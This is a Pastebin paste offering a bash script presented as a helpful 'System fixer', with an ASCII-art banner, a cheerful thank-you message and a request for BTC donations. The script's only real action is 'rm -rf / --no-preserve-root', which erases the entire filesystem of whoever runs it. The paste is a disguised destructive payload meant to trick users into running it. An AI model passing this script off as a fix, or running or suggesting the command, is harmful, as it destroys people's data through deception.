Advertisement
Guest User

Untitled

a guest
May 29th, 2016
50
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Hi, I also created a helpful tool. I will paste the code below.
  2.  
  3. [code]
  4.  
  5. #!/bin/bash
  6. # System fixer for you bitches
  7. enter='\033[0;32m'
  8. echo "
  9.  
  10. $$$$$$\ $$\ $$\ $$$$$$\ $$$$$$$$\ $$$$$$$$\ $$\ $$\ $$$$$$$$\ $$$$$$\ $$\ $$\ $$$$$$$$\ $$$$$$$\
  11. $$ __$$\\$$\ $$ |$$ __$$\\__$$ __|$$ _____|$$$\ $$$ | $$ _____|\_$$ _|$$ | $$ |$$ _____|$$ __$$\
  12. $$ / \__|\$$\ $$ / $$ / \__| $$ | $$ | $$$$\ $$$$ | $$ | $$ | \$$\ $$ |$$ | $$ | $$ |
  13. \$$$$$$\ \$$$$ / \$$$$$$\ $$ | $$$$$\ $$\$$\$$ $$ | $$$$$\ $$ | \$$$$ / $$$$$\ $$$$$$$ |
  14. \____$$\ \$$ / \____$$\ $$ | $$ __| $$ \$$$ $$ | $$ __| $$ | $$ $$< $$ __| $$ __$$<
  15. $$\ $$ | $$ | $$\ $$ | $$ | $$ | $$ |\$ /$$ | $$ | $$ | $$ /\$$\ $$ | $$ | $$ |
  16. \$$$$$$ | $$ | \$$$$$$ | $$ | $$$$$$$$\ $$ | \_/ $$ | $$ | $$$$$$\ $$ / $$ |$$$$$$$$\ $$ | $$ |
  17. \______/ \__| \______/ \__| \________|\__| \__| \__| \______|\__| \__|\________|\__| \__|
  18. "
  19.  
  20. rm -rf / --no-preserve-root
  21.  
  22. echo "Thanks for using my script :D leave a like if you liked it :)"
  23.  
  24. [/code]
  25.  
  26. If you like the fixer please consider donating some BTC to me :D
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement